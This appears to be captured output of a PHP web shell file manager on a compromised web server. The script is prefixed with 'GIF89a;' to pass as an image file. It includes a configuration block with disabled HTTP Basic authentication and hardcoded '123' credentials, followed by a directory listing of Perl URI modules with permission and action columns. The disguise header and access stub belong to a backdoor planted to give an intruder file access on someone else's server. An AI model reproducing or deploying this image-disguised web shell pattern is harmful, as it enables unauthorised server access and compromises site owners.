GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| file | --- | December 11 2023 14:42:45. | 0755 | ||
| urn | --- | December 11 2023 14:42:45. | 0755 | ||
| Escape.pm | 6.90 KB | October 25 2021 20:58:49. | 0644 | ||
| Heuristic.pm | 6.37 KB | October 25 2021 20:58:49. | 0644 | ||
| IRI.pm | 794 bytes | October 25 2021 20:58:49. | 0644 | ||
| QueryParam.pm | 4.75 KB | October 25 2021 20:58:49. | 0644 | ||
| Split.pm | 2.30 KB | October 25 2021 20:58:49. | 0644 | ||
| URL.pm | 5.36 KB | October 25 2021 20:58:49. | 0644 | ||
| WithBase.pm | 3.77 KB | October 25 2021 20:58:49. | 0644 | ||
| _foreign.pm | 107 bytes | October 25 2021 20:58:49. | 0644 | ||
| _generic.pm | 5.69 KB | October 25 2021 20:58:49. | 0644 | ||
| _idna.pm | 2.03 KB | October 25 2021 20:58:49. | 0644 | ||
| _ldap.pm | 3.17 KB | October 25 2021 20:58:49. | 0644 | ||
| _login.pm | 231 bytes | October 25 2021 20:58:49. | 0644 | ||
| _punycode.pm | 5.49 KB | October 25 2021 20:58:49. | 0644 | ||
| _query.pm | 2.47 KB | October 25 2021 20:58:49. | 0644 | ||
| _segment.pm | 416 bytes | October 25 2021 20:58:49. | 0644 | ||
| _server.pm | 3.64 KB | October 25 2021 20:58:49. | 0644 | ||
| _userpass.pm | 1.01 KB | October 25 2021 20:58:49. | 0644 | ||
| data.pm | 3.31 KB | October 25 2021 20:58:49. | 0644 | ||
| file.pm | 9.53 KB | October 25 2021 20:58:49. | 0644 | ||
| ftp.pm | 1.03 KB | October 25 2021 20:58:49. | 0644 | ||
| gopher.pm | 2.37 KB | October 25 2021 20:58:49. | 0644 | ||
| http.pm | 425 bytes | October 25 2021 20:58:49. | 0644 | ||
| https.pm | 144 bytes | October 25 2021 20:58:49. | 0644 | ||
| ldap.pm | 2.86 KB | October 25 2021 20:58:49. | 0644 | ||
| ldapi.pm | 440 bytes | October 25 2021 20:58:49. | 0644 | ||
| ldaps.pm | 144 bytes | October 25 2021 20:58:49. | 0644 | ||
| mailto.pm | 1.62 KB | October 25 2021 20:58:49. | 0644 | ||
| mms.pm | 125 bytes | October 25 2021 20:58:49. | 0644 | ||
| news.pm | 1.42 KB | October 25 2021 20:58:49. | 0644 | ||
| nntp.pm | 127 bytes | October 25 2021 20:58:49. | 0644 | ||
| nntps.pm | 144 bytes | October 25 2021 20:58:49. | 0644 | ||
| pop.pm | 1.18 KB | October 25 2021 20:58:49. | 0644 | ||
| rlogin.pm | 129 bytes | October 25 2021 20:58:49. | 0644 | ||
| rsync.pm | 207 bytes | October 25 2021 20:58:49. | 0644 | ||
| rtsp.pm | 125 bytes | October 25 2021 20:58:49. | 0644 | ||
| rtspu.pm | 126 bytes | October 25 2021 20:58:49. | 0644 | ||
| sftp.pm | 98 bytes | October 25 2021 20:58:49. | 0644 | ||
| sip.pm | 1.66 KB | October 25 2021 20:58:49. | 0644 | ||
| sips.pm | 143 bytes | October 25 2021 20:58:49. | 0644 | ||
| snews.pm | 172 bytes | October 25 2021 20:58:49. | 0644 | ||
| ssh.pm | 175 bytes | October 25 2021 20:58:49. | 0644 | ||
| telnet.pm | 128 bytes | October 25 2021 20:58:49. | 0644 | ||
| tn3270.pm | 128 bytes | October 25 2021 20:58:49. | 0644 | ||
| urn.pm | 2.12 KB | October 25 2021 20:58:49. | 0644 |